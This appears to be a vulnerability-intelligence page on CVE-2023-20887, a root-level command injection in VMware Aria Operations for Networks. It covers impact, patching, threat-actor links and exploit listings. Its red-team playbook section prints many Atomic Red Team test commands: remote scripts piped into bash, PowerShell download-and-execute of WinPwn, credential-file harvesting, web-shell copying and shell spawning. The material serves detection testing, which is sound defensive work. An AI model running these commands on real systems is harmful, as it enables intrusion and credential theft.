CVE-2023-20887
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the Apache Thrift RPC interface of Aria Operations for Networks. The affected component processes user-supplied data without adequate sanitization, enabling execution of arbitrary shell commands. The reverse proxy intended to protect the RPC interface can be bypassed, exposing the underlying service to unauthenticated network access.
Vulnerability Description
Aria Operations for Networks contains a command injection vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution.
Impact
An unauthenticated attacker with network access can execute arbitrary commands on the appliance with root privileges, enabling full system compromise. This includes the ability to manipulate system files, install malware, or pivot to other network resources. The exploit requires no user interaction or authentication, significantly increasing the attack surface. Successful exploitation can lead to complete loss of confidentiality, integrity, and availability of the affected system and potentially the broader network environment.
Solution
VMware has released security updates addressing this issue in Aria Operations for Networks as detailed in advisory VMSA-2023-0012. Users should apply the patches provided for version 6.x promptly. Detailed patching instructions and mitigation guidance are available at https://www.vmware.com/security/advisories/VMSA-2023-0012.html. No alternative workarounds are recommended by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The command injection vulnerability present in Aria Operations for Networks allows an attacker to execute arbitrary commands on the underlying operating system. This type of vulnerability typically arises when user input is improperly sanitized, enabling malicious actors to inject commands that the system will execute with the privileges of the application. In this case, the flaw can be exploited by anyone with network access to the affected product, which significantly broadens the attack surface. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk that could lead to severe consequences if left unaddressed.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting the network interface of the application. An attacker could craft specially designed requests that include malicious payloads, which the application would then process as legitimate commands. For instance, if an attacker can manipulate input fields or API requests, they could execute system-level commands, potentially leading to unauthorized access, data exfiltration, or complete system compromise. The ability to execute remote code means that an attacker could install malware, create backdoors, or disrupt services, making this vulnerability particularly dangerous in environments where sensitive data is handled.
The real-world impact of this vulnerability is significant, especially for organizations relying on Aria Operations for Networks for network management and monitoring. Successful exploitation could lead to unauthorized access to critical infrastructure, resulting in data breaches, loss of sensitive information, and potential regulatory repercussions. Furthermore, the operational disruption caused by such an attack could lead to financial losses, damage to reputation, and a loss of customer trust. Organizations may also face increased scrutiny from stakeholders and regulatory bodies, further compounding the business risk associated with this vulnerability.
To detect and mitigate the risks associated with this command injection vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the application before they are exploited. Additionally, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering and monitoring HTTP traffic to and from the application, blocking malicious requests before they reach the server. It is also crucial to ensure that all software components are up to date with the latest security patches provided by the vendor, as timely updates can close known vulnerabilities.
Moreover, organizations should enforce strict input validation and sanitization practices to prevent command injection attacks. This includes using parameterized queries and prepared statements when interacting with databases, as well as ensuring that user inputs are properly escaped and validated against expected formats. Security awareness training for employees can further reduce the risk of exploitation by educating them about the potential threats and best practices for maintaining security. By adopting these strategies, organizations can significantly reduce their exposure to the risks posed by this critical vulnerability in Aria Operations for Networks.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-20887, indicating increased adversary interest and operational activity. This surge is underscored by the emergence of multiple new proof-of-concept exploits publicly available on GitHub, as well as an active Metasploit module facilitating automated exploitation. The availability of these tools lowers the barrier for threat actors to conduct remote code execution attacks against VMware Aria Operations for Networks appliances, particularly those running vulnerable 6.x versions. Although there remains no confirmed linkage to ransomware campaigns, the association of known threat groups such as akira and UNC3886 with this vulnerability elevates the potential for opportunistic exploitation. Consequently, the threat level has intensified from a theoretical risk to a more imminent operational concern, necessitating heightened vigilance from defenders monitoring network access to affected systems.
Update 2 — July 04, 2026
CSURFACE threat intelligence has detected a notable surge in activity related to CVE-2023-20887, with telemetry indicating an increased frequency of exploitation attempts targeting VMware Aria Operations for Networks. This uptick coincides with a slight rise in the Exploit Prediction Scoring System (EPSS) score, reflecting growing confidence in the vulnerability’s exploitability. Concurrently, multiple new proof-of-concept exploits have emerged publicly, including several well-starred GitHub repositories and a Metasploit module that facilitates remote code execution with root privileges. These developments lower the technical barriers for threat actors, enabling more widespread and automated exploitation campaigns. Although there remains no confirmed ransomware deployment linked to this vulnerability, the continued association with threat groups such as akira and UNC3886 underscores persistent adversary interest. Collectively, these factors elevate the operational risk from a theoretical concern to an active threat, necessitating heightened monitoring of network access to affected VMware appliances and signaling an increased likelihood of successful compromise attempts in the near term.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Aria Operations For Networks | All |
cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE
exploits/linux/http/vmware_vrni_rce_cve_2023_20887
|
Sina Kheirkhah, Anonymous with Trend Micro Zero Day Initiative, h00die | Unknown | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
sinsinology/CVE-2023-20887
VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)
|
sinsinology | 229 | 41 | 2023-06-13 | View |
|
Malwareman007/CVE-2023-20887
VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)
|
Malwareman007 | 8 | 1 | 2023-09-25 | View |
|
miko550/CVE-2023-20887
VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)
|
miko550 | 6 | 2 | 2023-06-14 | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-20887 |
| vmware.com |
GitHub CVE
|
https://www.vmware.com/security/advisories/VMSA-2023-0012.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-20887 |